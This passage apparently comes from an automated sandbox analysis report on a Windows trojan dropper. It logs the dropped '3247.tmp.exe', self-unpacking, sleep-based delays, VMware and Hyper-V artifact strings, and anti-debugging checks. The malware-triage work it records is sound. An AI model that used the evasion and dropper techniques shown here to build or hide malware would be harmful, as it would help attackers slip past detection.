                  Source: 3247.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/5
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A0A48E CreateToolhelp32Snapshot,Module32First,0_2_00A0A48E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_004361E0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\track_prt[1].htmJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7976
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile created: C:\Users\user\AppData\Local\Temp\3247.tmpJump to behavior
                  Source: XIaCqh1vRm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: XIaCqh1vRm.exeVirustotal: Detection: 41%
                  Source: XIaCqh1vRm.exeReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Users\user\Desktop\XIaCqh1vRm.exe "C:\Users\user\Desktop\XIaCqh1vRm.exe"
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeProcess created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe "C:\Users\user\AppData\Local\Temp\3247.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeProcess created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe "C:\Users\user\AppData\Local\Temp\3247.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeUnpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeUnpacked PE file: 0.2.XIaCqh1vRm.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeUnpacked PE file: 3.2.3247.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A0D085 push 00000003h; ret 0_2_00A0D089
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A0B2DA push es; iretd 0_2_00A0B2EB
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A0F692 pushad ; ret 0_2_00A0F6AE
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A0CBE4 pushad ; ret 0_2_00A0CC0C
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A09CD push ecx; ret 0_2_024A09E0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C799F push esp; retf 0_2_024C79A7
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024ACE18 push ss; retf 0_2_024ACE1D
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0249FFF3 push ecx; ret 0_2_024A0006
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C7F9D push esp; retf 0_2_024C7F9E
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C9DE8 pushad ; retf 0_2_024C9DEF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h3_2_0043BF01
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1C167 push eax; mov dword ptr [esp], 49484716h3_2_00B1C168
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1F555 push esp; iretd 3_2_00B1F556
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFAF5D push esp; iretd 3_2_00AFAF66
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00BDC4D5 pushad ; ret 3_2_00BDC4DA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00BDC75B push ebp; ret 3_2_00BDC760
                  Source: XIaCqh1vRm.exeStatic PE information: section name: .text entropy: 7.542990652047153
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                  Source: 3247.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile created: C:\Users\user\AppData\Local\Temp\3247.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeWindow / User API: threadDelayed 3454Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeWindow / User API: threadDelayed 6531Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65482
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928Thread sleep count: 3454 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928Thread sleep time: -2493788s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928Thread sleep count: 6531 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe TID: 7928Thread sleep time: -4715382s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe TID: 8036Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C8C59 FindFirstFileExW,0_2_024C8C59
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000002.1856236713.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00A09D6B push dword ptr fs:[00000030h]0_2_00A09D6B
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C00C6 mov eax, dword ptr fs:[00000030h]0_2_024C00C6
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0249092B mov eax, dword ptr fs:[00000030h]0_2_0249092B
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h]0_2_02490D90
